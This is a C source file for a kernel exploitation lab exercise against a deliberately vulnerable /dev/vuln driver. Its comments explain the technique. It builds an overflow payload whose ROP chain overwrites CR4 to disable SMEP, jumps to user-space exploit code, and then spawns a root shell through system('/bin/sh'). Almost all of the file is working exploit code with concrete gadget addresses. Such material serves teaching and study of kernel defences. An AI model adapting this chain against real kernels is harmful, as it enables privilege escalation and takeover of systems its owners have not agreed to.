#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

/*
 * This time the kernel starts with SMEP enabled.  We create a small ROP chain
 * that overwrites CR4 and resets the SMEP-enable bit (number 20 counting from
 * zero), then continues like in exercise 1.
 *
 * To be safe, we should leave the other bits of CR4 in their current state.
 * We are not allowed to read CR4 from userspace, but the kernel will print the
 * contents of CR4 when we cause a kernel crash (if we don't have access to the
 * logs, we must put something reasonable in CR4).
 *
 * The cr4-loading gadget also loads the flags from rdx, as a side effect. We
 * need to put something sensible in rdx too, since some flags have undesired
 * effects that may lead to a kernel panic (e.g., the Trap flag will cause
 * a debug exception in the kernel, the Direction flag will invert the direction
 * of the 'rep movs' instructions typically used in memcpy(), etc.)
 */

extern void asm_exploit(void);
extern void get_regs(void);

unsigned long user_cs;
unsigned long user_ss;
unsigned long user_flags;
#define USTACKSZ 1024
unsigned char __attribute__((aligned(16))) user_stack[USTACKSZ];
unsigned char *user_stack_end = user_stack + USTACKSZ - sizeof(unsigned long);

#define OFFSET (5*8+16)
#define PAYLOAD_LINES 6	// this must match the number of '*rop++' lines

#define PAYLOADSZ (OFFSET + PAYLOAD_LINES * sizeof(unsigned long))
char payload[PAYLOADSZ];

int main()
{
	int fd;
	int i;
	char *p;
	unsigned long *rop;

	get_regs();

	for (p = payload; p < payload + OFFSET; p++) {
		*p = 'A';
	}
	rop = (unsigned long *)p;
	*rop++ = 0xffffffff8100284a; // pop rdi
	*rop++ = 0x00000000004406f0; // new cr4 with SMEP disabled
	*rop++ = 0xffffffff810445a8; // pop rdx
	*rop++ = user_flags;
	*rop++ = 0xffffffff8103c39e; // rdi -> cr4; rdx -> flags
	*rop++ = (unsigned long)&asm_exploit;

	fd = open("/dev/vuln", O_WRONLY);
	if (fd < 0) {
		perror("/dev/vuln");
		exit(1);
	}

	(void)write(fd, payload, PAYLOADSZ);
	printf("If you see this the offset is probably wrong\n");
	exit(1);
}

void cont()
{
	system("/bin/sh");
	_exit(0);
}
